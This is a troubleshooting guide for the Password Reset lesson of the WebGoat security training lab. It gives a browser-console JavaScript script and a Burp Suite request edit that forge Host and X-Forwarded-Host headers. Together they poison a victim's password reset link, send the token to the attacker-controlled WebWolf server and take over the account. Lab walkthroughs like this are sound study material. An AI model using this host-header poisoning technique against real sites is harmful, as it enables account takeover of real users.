====================================
PASSWORD RESET - TROUBLESHOOTING
====================================

PROBLEM: No requests appearing in WebWolf after sending password reset

POSSIBLE CAUSES:
1. PowerShell doesn't properly manipulate the Host header
2. Tom needs to "click" the link (there might be a button in WebGoat UI)
3. Wrong endpoint or method
4. WebGoat checks actual connection endpoint instead of Host header

====================================
SOLUTION 1: Check WebGoat UI
====================================

1. Go to the Password Reset lesson page in WebGoat
2. Look for:
   - A button that says "Simulate Tom clicking the link"
   - Instructions mentioning "click" or "trigger"
   - A section about "intercepting the email"

3. Steps might be:
   a) Send reset request with manipulated Host header
   b) Click a button to simulate Tom receiving the email
   c) Tom "clicks" the link, which sends request to WebWolf
   d) Capture the token from WebWolf

====================================
SOLUTION 2: Try Browser Console
====================================

1. Open WebGoat in Firefox: http://192.168.254.112:8001/WebGoat
2. Navigate to the Password Reset lesson
3. Press F12 to open Developer Tools
4. Go to Console tab
5. Copy and paste this entire script:

-------- COPY FROM HERE --------

// Password Reset Host Header Attack
async function tryHostHeaderAttack() {
    const methods = [
        {
            name: 'Host header',
            headers: {
                'Host': '192.168.254.112:8002',
                'Content-Type': 'application/x-www-form-urlencoded'
            }
        },
        {
            name: 'X-Forwarded-Host',
            headers: {
                'X-Forwarded-Host': '192.168.254.112:8002',
                'Content-Type': 'application/x-www-form-urlencoded'
            }
        }
    ];

    for (const method of methods) {
        console.log(`[Trying] ${method.name}...`);
        
        try {
            const response = await fetch('/WebGoat/PasswordReset/ForgotPassword/create-password-reset-link', {
                method: 'POST',
                headers: method.headers,
                body: 'email=tom@webgoat-cloud.org',
                credentials: 'include'
            });

            const result = await response.json();
            console.log(`Response: ${result.feedback}`);
            
            if (result.lessonCompleted === true) {
                console.log('[SUCCESS] Challenge completed!');
                return;
            }
            
        } catch (error) {
            console.log(`[ERROR] ${error.message}`);
        }
    }

    console.log('\nCheck WebWolf: http://192.168.254.112:8002/requests');
}

tryHostHeaderAttack();

-------- COPY TO HERE --------

6. Press Enter
7. Check WebWolf: http://192.168.254.112:8002/requests

====================================
SOLUTION 3: Use Burp Suite
====================================

If browser console doesn't work, Burp Suite is the most reliable:

1. Configure Firefox to use Burp proxy (see BURP_SUITE_SETUP_GUIDE.txt)

2. In Burp:
   - Go to Proxy > Intercept
   - Turn intercept ON

3. In WebGoat, submit the password reset form for Tom

4. Burp will intercept the request. Modify it:

   Original:
   POST /WebGoat/PasswordReset/ForgotPassword/create-password-reset-link HTTP/1.1
   Host: 192.168.254.112:8001
   
   Change to:
   POST /WebGoat/PasswordReset/ForgotPassword/create-password-reset-link HTTP/1.1
   Host: 192.168.254.112:8002

5. Forward the request
6. Check WebWolf for the captured token

====================================
SOLUTION 4: Alternative PowerShell
====================================

Try different header combinations:

.\password_reset_ALL_METHODS.ps1

This tries:
- Host header
- X-Forwarded-Host
- X-Forwarded-Server
- X-Host
- All combined

====================================
WHAT TO LOOK FOR IN WEBGOAT UI
====================================

The lesson page might have:

1. Two separate sections:
   - Section 1: Manipulate the Host header (Assignment 77)
   - Section 2: Login as Tom (Assignment 79)

2. Instructions like:
   "After sending the reset request, click the button below to 
    simulate Tom clicking the reset link"

3. A form with:
   - Email input field
   - Submit button
   - A separate "Simulate click" button

4. Hints or tips that explain:
   - How to intercept the request
   - Where to find the reset token
   - What to do with the token once captured

====================================
DEBUGGING STEPS
====================================

Run the debug script to see detailed information:

.\password_reset_DEBUG.ps1

This will:
1. Check WebWolf accessibility
2. Try sending the reset request
3. Show all responses
4. Test alternative endpoints

====================================
EXPECTED BEHAVIOR
====================================

When successful:
1. Send reset request with Host: 192.168.254.112:8002
2. WebGoat generates reset email with link to WebWolf
3. Tom "clicks" link (might need to trigger this in UI)
4. WebWolf receives the request with the reset token
5. You capture the token from WebWolf
6. Use token to reset Tom's password
7. Login as Tom to complete both challenges

====================================
NEXT STEPS
====================================

1. Check the WebGoat lesson page carefully for buttons/instructions
2. Try the browser console approach
3. If still failing, use Burp Suite
4. Look for any "click" or "trigger" buttons in the WebGoat UI

====================================
